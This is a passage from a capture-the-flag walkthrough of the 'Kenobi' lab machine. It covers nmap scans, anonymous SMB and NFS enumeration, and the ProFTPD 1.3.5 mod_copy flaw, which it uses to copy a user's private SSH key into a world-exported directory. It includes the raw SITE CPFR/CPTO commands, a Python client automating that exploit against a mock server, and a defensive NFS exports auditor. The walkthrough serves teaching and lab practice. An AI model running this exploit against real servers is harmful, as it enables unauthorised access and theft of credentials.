KENOBI
KENOBI (LINUX: SAMBA / NFS / PROFTPD)
First, we run nmap against the target to enumerate open TCP ports, grab service versions (-sV) and run the default NSE scripts (-sC):
- sudo nmap -n -Pn -sV -sC --min-rate 50000 10.10.81.7 -vvv -sS
--min-rate 50000 is very aggressive for a VPN link; the log below shows nmap increasing its send delay after 250 of 833 probes were dropped, so if a port seems to be missing, rerun with a lower rate.
This revealed seven open TCP ports:
- FTP (21): ProFTPD 1.3.5
- SSH (22): OpenSSH 7.2p2
- HTTP (80): Apache 2.4.18, with /admin.html disallowed in robots.txt
- rpcbind (111)
- NetBIOS-SSN (139): Samba
- SMB (445): Samba 4.3.11-Ubuntu
- NFS (2049)
Two details from the host scripts matter later: SMB message signing is enabled but not required, and the box is a standalone workgroup member (workgroup WORKGROUP, empty domain name), not an Active Directory host.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -n -Pn -sV -sC --min-rate 50000 10.10.81.7 -vvv -sS
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 15:39 CEST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:39
Completed NSE at 15:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:39
Completed NSE at 15:39, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:39
Completed NSE at 15:39, 0.00s elapsed
Initiating SYN Stealth Scan at 15:39
Scanning 10.10.81.7 [1000 ports]
Discovered open port 21/tcp on 10.10.81.7
Discovered open port 445/tcp on 10.10.81.7
Discovered open port 139/tcp on 10.10.81.7
Discovered open port 22/tcp on 10.10.81.7
Discovered open port 111/tcp on 10.10.81.7
Discovered open port 80/tcp on 10.10.81.7
Discovered open port 2049/tcp on 10.10.81.7
Increasing send delay for 10.10.81.7 from 0 to 5 due to 250 out of 833 dropped probes since last increase.
Completed SYN Stealth Scan at 15:39, 0.72s elapsed (1000 total ports)
Initiating Service scan at 15:39
Scanning 7 services on 10.10.81.7
Completed Service scan at 15:39, 11.99s elapsed (7 services on 1 host)
NSE: Script scanning 10.10.81.7.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:39
Completed NSE at 15:39, 10.77s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:39
Completed NSE at 15:39, 2.27s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:39
Completed NSE at 15:39, 0.00s elapsed
Nmap scan report for 10.10.81.7
Host is up, received user-set (0.34s latency).
Scanned at 2025-04-10 15:39:17 CEST for 26s
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 ProFTPD 1.3.5
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8m00IxH/X5gfu6Cryqi5Ti2TKUSpqgmhreJsfLL8uBJrGAKQApxZ0lq2rKplqVMs+xwlGTuHNZBVeURqvOe9MmkMUOh4ZIXZJ9KNaBoJb27fXIvsS6sgPxSUuaeoWxutGwHHCDUbtqHuMAoSE2Nwl8G+VPc2DbbtSXcpu5c14HUzktDmsnfJo/5TFiRuYR0uqH8oDl6Zy3JSnbYe/QY+AfTpr1q7BDV85b6xP97/1WUTCw54CKUTV25Yc5h615EwQOMPwox94+48JVmgE00T4ARC3l6YWibqY6a5E8BU+fksse35fFCwJhJEk6xplDkeauKklmVqeMysMWdiAQtDj
| 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBpJvoJrIaQeGsbHE9vuz4iUyrUahyfHhN7wq9z3uce9F+Cdeme1O+vIfBkmjQJKWZ3vmezLSebtW3VRxKKH3n8=
| 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGB22m99Wlybun7o/h9e6Ea/9kHMT0Dz2GqSodFqIWDi
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin.html
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind syn-ack ttl 61 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100021 1,3,4 39169/tcp6 nlockmgr
|_ 100021 1,3,4 51159/udp6 nlockmgr
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs syn-ack ttl 61 2-4 (RPC #100003)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2025-04-10T13:39:36
|_ start_date: N/A
|_clock-skew: mean: 1h40m05s, deviation: 2h53m12s, median: 4s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 30118/tcp): CLEAN (Couldn't connect)
| Check 2 (port 45344/tcp): CLEAN (Couldn't connect)
| Check 3 (port 46941/udp): CLEAN (Failed to receive data)
| Check 4 (port 32126/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| KENOBI<00> Flags: <unique><active>
| KENOBI<03> Flags: <unique><active>
| KENOBI<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: kenobi
| NetBIOS computer name: KENOBI\x00
| Domain name: \x00
| FQDN: kenobi
|_ System time: 2025-04-10T08:39:36-05:00
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:39
Completed NSE at 15:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:39
Completed NSE at 15:39, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:39
Completed NSE at 15:39, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.36 seconds
Raw packets sent: 1417 (62.348KB) | Rcvd: 1000 (40.028KB)
sudo nmap -n -p 445,139 -vvv -Pn -sC -sV 10.10.81.7
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 15:42 CEST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
Initiating SYN Stealth Scan at 15:42
Scanning 10.10.81.7 [2 ports]
Discovered open port 139/tcp on 10.10.81.7
Discovered open port 445/tcp on 10.10.81.7
Completed SYN Stealth Scan at 15:42, 0.33s elapsed (2 total ports)
Initiating Service scan at 15:42
Scanning 2 services on 10.10.81.7
Completed Service scan at 15:42, 11.95s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.81.7.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:42
Completed NSE at 15:42, 10.75s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
Nmap scan report for 10.10.81.7
Host is up, received user-set (0.31s latency).
Scanned at 2025-04-10 15:42:25 CEST for 23s
PORT STATE SERVICE REASON VERSION
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: KENOBI
Host script results:
| nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| KENOBI<00> Flags: <unique><active>
| KENOBI<03> Flags: <unique><active>
| KENOBI<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb2-time:
| date: 2025-04-10T13:42:44
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 30118/tcp): CLEAN (Couldn't connect)
| Check 2 (port 45344/tcp): CLEAN (Couldn't connect)
| Check 3 (port 46941/udp): CLEAN (Failed to receive data)
| Check 4 (port 32126/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: kenobi
| NetBIOS computer name: KENOBI\x00
| Domain name: \x00
| FQDN: kenobi
|_ System time: 2025-04-10T08:42:44-05:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: 1h40m05s, deviation: 2h53m13s, median: 4s
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:42
Completed NSE at 15:42, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.53 seconds
Raw packets sent: 2 (88B) | Rcvd: 2 (88B)
Next we enumerate SMB shares and users with the smb-enum-shares and smb-enum-users NSE scripts. Three shares come back; two of them, anonymous and IPC$, report anonymous READ/WRITE access. IPC$ accepts null sessions on almost every Samba server, so the interesting one is anonymous, backed by /home/kenobi/share (Nmap prints paths Windows-style, C:\home\kenobi\share). Note the "account_used: guest" line: the server maps unknown or empty logins to the guest account, which is what makes the anonymous access possible.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.81.7 -vvv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 15:46 CEST
NSE: Loaded 2 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:46
Completed NSE at 15:46, 0.00s elapsed
Initiating Ping Scan at 15:46
Scanning 10.10.81.7 [4 ports]
Completed Ping Scan at 15:46, 0.33s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:46
Completed Parallel DNS resolution of 1 host. at 15:46, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:46
Scanning 10.10.81.7 [1 port]
Discovered open port 445/tcp on 10.10.81.7
Completed SYN Stealth Scan at 15:46, 0.33s elapsed (1 total ports)
NSE: Script scanning 10.10.81.7.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:46
NSE Timing: About 50.00% done; ETC: 15:47 (0:00:31 remaining)
Completed NSE at 15:46, 55.10s elapsed
Nmap scan report for 10.10.81.7
Host is up, received echo-reply ttl 61 (0.31s latency).
Scanned at 2025-04-10 15:46:04 CEST for 55s
PORT STATE SERVICE REASON
445/tcp open microsoft-ds syn-ack ttl 61
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.81.7\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.81.7\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.81.7\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:46
Completed NSE at 15:46, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 55.99 seconds
Raw packets sent: 5 (196B) | Rcvd: 2 (72B)
smbclient with a null session (-N, no password; -L, list) confirms the same three shares (print$, anonymous, IPC$) and, after falling back to SMB1 for the workgroup listing, the server name (KENOBI) and workgroup (WORKGROUP). The fallback is itself a finding: the server still speaks SMBv1.
┌──(kali㉿kali)-[~]
└─$ smbclient -NL //10.10.81.7
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (kenobi server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP KENOBI
netexec shows the same from a different angle: a login as 'kenobi' with an empty password is accepted, but the "(Guest)" tag means Samba mapped it to the guest account rather than authenticating kenobi, which is why only the anonymous share shows READ. The banner also records signing:False and SMBv1:True, consistent with the Nmap smb-security-mode output above.
┌──(kali㉿kali)-[~]
└─$ netexec smb 10.10.81.7 -u 'kenobi' -p '' --shares
SMB 10.10.81.7 445 KENOBI [*] Unix - Samba (name:KENOBI) (domain:) (signing:False) (SMBv1:True)
SMB 10.10.81.7 445 KENOBI [+] \kenobi: (Guest)
SMB 10.10.81.7 445 KENOBI [*] Enumerated shares
SMB 10.10.81.7 445 KENOBI Share Permissions Remark
SMB 10.10.81.7 445 KENOBI ----- ----------- ------
SMB 10.10.81.7 445 KENOBI print$ Printer Drivers
SMB 10.10.81.7 445 KENOBI anonymous READ
SMB 10.10.81.7 445 KENOBI IPC$ IPC Service (kenobi server (Samba, Ubuntu))
Now we connect to the anonymous share. No password is needed (just press Enter at the prompt); sudo is not required either, it only changes the default username shown in the prompt to root. Inside the share we list the contents and download the only file with these two commands:
- ls (list files and directories)
- get log.txt (download log.txt to the current directory on our machine)
sudo smbclient //10.10.81.7/anonymous
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 12:49:09 2019
.. D 0 Wed Sep 4 12:56:07 2019
log.txt N 12237 Wed Sep 4 12:49:09 2019
9204224 blocks of size 1024. 6877104 blocks available
smb: \>
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (8.8 KiloBytes/sec) (average 8.8 KiloBytes/sec)
smb: \>
log.txt is the transcript of an ssh-keygen run for the user 'kenobi', followed by the ProFTPD configuration. The important part: the private key was saved to /home/kenobi/.ssh/id_rsa and no passphrase was entered, so anyone who can read that file can log in as kenobi.
cat log.txt
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa):
Created directory '/home/kenobi/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kenobi/.ssh/id_rsa.
Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.
# This is a basic ProFTPD configuration file (rename it to
# 'proftpd.conf' for actual use. It establishes a single server
# and a single anonymous login. It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.
ServerName "ProFTPD Default Installation"
ServerType standalone
DefaultServer on
# Port 21 is the standard FTP port.
Port 21
NFS next. rpcbind on port 111 lets the nfs-showmount script ask for the export list: /var is exported to every host (*), and nfs-ls can already read its top-level directory listing without mounting anything. A world-exported /var is a weakness on its own; combined with a way to write files into it, it becomes a remote file-read channel, which is exactly how it is used below.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.81.7 -vvv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 15:59 CEST
NSE: Loaded 3 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:59
Completed NSE at 15:59, 0.00s elapsed
Initiating Ping Scan at 15:59
Scanning 10.10.81.7 [4 ports]
Completed Ping Scan at 15:59, 0.33s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:59
Completed Parallel DNS resolution of 1 host. at 15:59, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:59
Scanning 10.10.81.7 [1 port]
Discovered open port 111/tcp on 10.10.81.7
Completed SYN Stealth Scan at 15:59, 0.34s elapsed (1 total ports)
NSE: Script scanning 10.10.81.7.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:59
Completed NSE at 15:59, 6.49s elapsed
Nmap scan report for 10.10.81.7
Host is up, received reset ttl 61 (0.31s latency).
Scanned at 2025-04-10 15:59:50 CEST for 7s
PORT STATE SERVICE REASON
111/tcp open rpcbind syn-ack ttl 61
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /var 9204224.0 1836528.0 6877100.0 22% 16.0T 32000
| nfs-ls: Volume /var
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 .
| rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 ..
| rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups
| rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache
| rwxrwxrwx 0 0 4096 2019-09-04T08:43:56 crash
| rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local
| rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock
| rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log
| rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www
|_
| nfs-showmount:
|_ /var *
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:59
Completed NSE at 15:59, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.40 seconds
Raw packets sent: 5 (196B) | Rcvd: 2 (84B)
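The showmount result only tells us that /var is exported to "*"; the export options (rw/ro, root_squash) are what decide how bad that is, and they live in /etc/exports on the server. The following is an added example, not code from the writeup or from TryHackMe: a small auditor for /etc/exports lines that flags wildcard clients, no_root_squash and the insecure option, and rewrites an offending line with a caller-supplied subnet. The SAMPLE_EXPORTS content is constructed for illustration; the target's real option string was never visible.

```python
"""Added example (not from the Kenobi room): audit /etc/exports lines for the
weaknesses the showmount result hints at. Only `/var *` was visible on the
target; the option strings in SAMPLE_EXPORTS are constructed for illustration."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample; not the target's real /etc/exports.
SAMPLE_EXPORTS = """\
# /etc/exports: NFS access control list
/var *(rw,sync,no_root_squash,no_subtree_check)
/srv/share 10.10.0.0/16(ro,sync,root_squash)
/home/kenobi/share  *(ro,sync)
/backup 10.10.81.5(rw,sync,no_root_squash) 10.10.81.6(ro,sync)
"""

_SPEC_RE = re.compile(r"([^(]*)(?:\((.*)\))?")   # host(opt,opt) or bare host


@dataclass
class Export:
    path: str
    client: str
    options: list[str]

    @property
    def world(self) -> bool:
        # "*" matches every host; "*.example.com" every host in a domain.
        return self.client in ("*", "0.0.0.0/0") or self.client.startswith("*.")


def parse_exports(text: str) -> list[Export]:
    """One Export per (path, client) pair. A path with no client field, or a
    bare "(opts)" token, means every host, which is how exportfs reads it."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        path, specs = parts[0], parts[1:] or ["*"]
        for spec in specs:
            m = _SPEC_RE.fullmatch(spec)
            if m is None:
                continue                      # malformed token, skip it
            host = m.group(1) or "*"
            opts = [o.strip() for o in m.group(2).split(",")] if m.group(2) else []
            exports.append(Export(path, host, opts))
    return exports


def audit(exports: list[Export]) -> list[dict]:
    """Findings in export order, each with a severity and a one-line reason."""
    findings = []
    for e in exports:
        opts = set(e.options)
        rw = "rw" in opts
        if e.world:
            findings.append({"path": e.path, "client": e.client,
                             "severity": "HIGH" if rw else "MEDIUM",
                             "issue": "exported to every host" + (" read/write" if rw else "")})
        if "no_root_squash" in opts:
            findings.append({"path": e.path, "client": e.client,
                             "severity": "CRITICAL" if (e.world and rw) else "HIGH",
                             "issue": "no_root_squash: a client's root is root on the export "
                                      "(can plant SUID binaries)"})
        if "insecure" in opts:
            findings.append({"path": e.path, "client": e.client, "severity": "MEDIUM",
                             "issue": "insecure: requests accepted from unprivileged source "
                                      "ports, so any local user on a client can speak NFS"})
    return findings


def hardened_line(e: Export, allowed_client: str) -> str:
    """Rewrite one export: drop the dangerous options, force root_squash and
    replace a wildcard client with an explicit host/subnet chosen by the caller."""
    opts = [o for o in e.options if o not in ("no_root_squash", "insecure")]
    if "root_squash" not in opts:
        opts.append("root_squash")
    client = allowed_client if e.world else e.client
    return f"{e.path} {client}({','.join(opts)})"


if __name__ == "__main__":
    exps = parse_exports(SAMPLE_EXPORTS)
    for f in audit(exps):
        print(f"{f['severity']:8} {f['path']} {f['client']}: {f['issue']}")
    print("fix:", hardened_line(exps[0], "10.10.0.0/16"))
```

On the real box the same check would be run as root on /etc/exports (or on `exportfs -v` output); the severity ladder is deliberately simple: a world-readable export is medium, world-writable is high, and world-writable without root squashing is critical, because a client can then drop a root-owned SUID binary into the export.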
Before looking for exploits we confirm the FTP version from the banner on port 21 (it matches the Nmap -sV result):
┌──(kali㉿kali)-[~]
└─$ nc 10.10.81.7 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.81.7]
searchsploit lists several entries for ProFTPD 1.3.5, all around the mod_copy module. mod_copy adds the SITE CPFR and SITE CPTO commands, and in 1.3.5 the server accepts them before any authentication (CVE-2015-3306), so an unauthenticated client can make the daemon copy files between any two paths its own user can read and write.
┌──(kali㉿kali)-[~]
└─$ searchsploit ProFTPD 1.3.5
-------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Met | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Executi | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Executi | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
-------------------------------------------------- ----------------------------
With mod_copy we have the server copy kenobi's private key from its protected location (/home/kenobi/.ssh/) into /var/tmp/, which is world-writable and, as seen above, exported over NFS. The copy is performed by the FTP daemon itself, so it works as long as the daemon's user can read the key and write to /var/tmp; no USER/PASS is ever sent. The steps:
- nc 10.10.81.7 21 (connect to the FTP control channel)
- SITE CPFR /home/kenobi/.ssh/id_rsa (CoPy FRom: the source path; a 350 reply means the file exists)
- SITE CPTO /var/tmp/id_rsa (CoPy TO: the destination path; a 250 reply means the copy was made)
nc 10.10.81.7 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.81.7]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
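The exchange above done by hand over nc. What follows is an added example, not part of the writeup and not one of the searchsploit entries: a small Python client that sends the same SITE CPFR / SITE CPTO sequence but checks the reply codes (350, then 250) instead of assuming success, together with a constructed MockProFTPD that answers the way a vulnerable 1.3.5 does so the script can run offline. The banner text, the paths and the mock's read/write rules are assumptions made for the example.

```python
"""Added example (not part of the Kenobi writeup): the mod_copy SITE CPFR/CPTO
exchange as a small client that checks reply codes, plus a constructed mock
server that answers the way a vulnerable ProFTPD 1.3.5 does, so it runs offline.
The banner text, paths and the mock's permission rules are assumptions."""
import socket
import threading


class FtpError(Exception):
    """Raised when the server refuses a step of the copy sequence."""


def _readline(sock):
    """Read one CRLF-terminated FTP line (byte at a time; replies are short)."""
    buf = b""
    while not buf.endswith(b"\n"):
        chunk = sock.recv(1)
        if not chunk:
            raise FtpError("connection closed")
        buf += chunk
    return buf.decode("latin-1").rstrip("\r\n")


def mod_copy(host, port, src, dst, timeout=5.0):
    """Ask the server to copy src to dst via mod_copy. No USER/PASS is sent:
    on 1.3.5 the SITE CPFR/CPTO handlers run before authentication.
    Returns the two reply lines; raises FtpError if either step is refused."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = _readline(s)
        if not banner.startswith("220"):
            raise FtpError("unexpected banner: " + banner)

        def cmd(line):
            s.sendall(line.encode("latin-1") + b"\r\n")
            return _readline(s)

        cpfr = cmd("SITE CPFR " + src)
        if not cpfr.startswith("350"):          # 350 = source accepted
            raise FtpError("CPFR refused: " + cpfr)
        cpto = cmd("SITE CPTO " + dst)
        if not cpto.startswith("250"):          # 250 = copy done
            raise FtpError("CPTO refused: " + cpto)
        cmd("QUIT")
        return cpfr, cpto


class MockProFTPD(threading.Thread):
    """Constructed stand-in for a vulnerable server (handles one connection).
    readable: exact paths the daemon's user may read; writable: directory
    prefixes it may write to. Real ProFTPD applies its own uid/gid instead."""

    def __init__(self, readable, writable):
        super().__init__(daemon=True)
        self.readable, self.writable = set(readable), tuple(writable)
        self.copies = []                       # (src, dst) pairs it "copied"
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(1)
        self.port = self.sock.getsockname()[1]

    def run(self):
        conn, _ = self.sock.accept()
        src = None
        with conn, self.sock:
            conn.sendall(b"220 ProFTPD 1.3.5 Server (mock) [127.0.0.1]\r\n")
            while True:
                try:
                    line = _readline(conn)
                except FtpError:
                    return                     # client went away
                verb, _, arg = line.partition(" ")
                if verb.upper() == "QUIT":
                    conn.sendall(b"221 Goodbye.\r\n")
                    return
                sub, _, path = arg.partition(" ")
                if verb.upper() != "SITE" or sub.upper() not in ("CPFR", "CPTO"):
                    reply = b"500 Command not understood"
                elif sub.upper() == "CPFR":
                    src = path if path in self.readable else None
                    reply = (b"350 File or directory exists, ready for destination name"
                             if src else b"550 " + path.encode() + b": No such file or directory")
                elif src is None:
                    reply = b"503 Bad sequence of commands"
                elif path.startswith(self.writable):
                    self.copies.append((src, path))
                    reply = b"250 Copy successful"
                else:
                    reply = b"550 " + path.encode() + b": Permission denied"
                conn.sendall(reply + b"\r\n")


def copy_demo(readable, writable, src, dst):
    """Run the client against a mock with the given permission rules."""
    srv = MockProFTPD(readable, writable)
    srv.start()
    try:
        replies = mod_copy("127.0.0.1", srv.port, src, dst)
    finally:
        srv.join(timeout=3)
    return replies, list(srv.copies)


if __name__ == "__main__":
    print(copy_demo({"/home/kenobi/.ssh/id_rsa"}, ["/var/tmp/"],
                    "/home/kenobi/.ssh/id_rsa", "/var/tmp/id_rsa"))
```

Pointing mod_copy at a real host means replacing the mock with the target's address and port; the client is the same. The reply-code checks are the part worth keeping: a 550 on CPFR tells you the daemon's user cannot see the source, a 550 on CPTO that the destination is not writable for it, and either one rules out that path without guessing.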
Now we mount the NFS export on our machine. Mounting needs root; the first attempt below runs mount without sudo and fails with "mount.nfs: failed to apply fstab options", which is the error you get as an unprivileged user. The commands:
- sudo mkdir /mnt/kenobiNFS (create the mount point)
- sudo mount 10.10.81.7:/var /mnt/kenobiNFS (mount the /var export on /mnt/kenobiNFS)
- ls -la /mnt/kenobiNFS (list the mounted export)
┌──(kali㉿kali)-[~]
└─$ sudo mkdir /mnt/kenobiNFS
[sudo] password for kali:
┌──(kali㉿kali)-[~]
└─$ mount 10.10.81.7:/var /mnt/kenobiNFS
mount.nfs: failed to apply fstab options
┌──(kali㉿kali)-[~]
└─$ sudo mount 10.10.81.7:/var /mnt/kenobiNFS
┌──(kali㉿kali)-[~]
└─$ ls -la /mnt/kenobiNFS
total 56
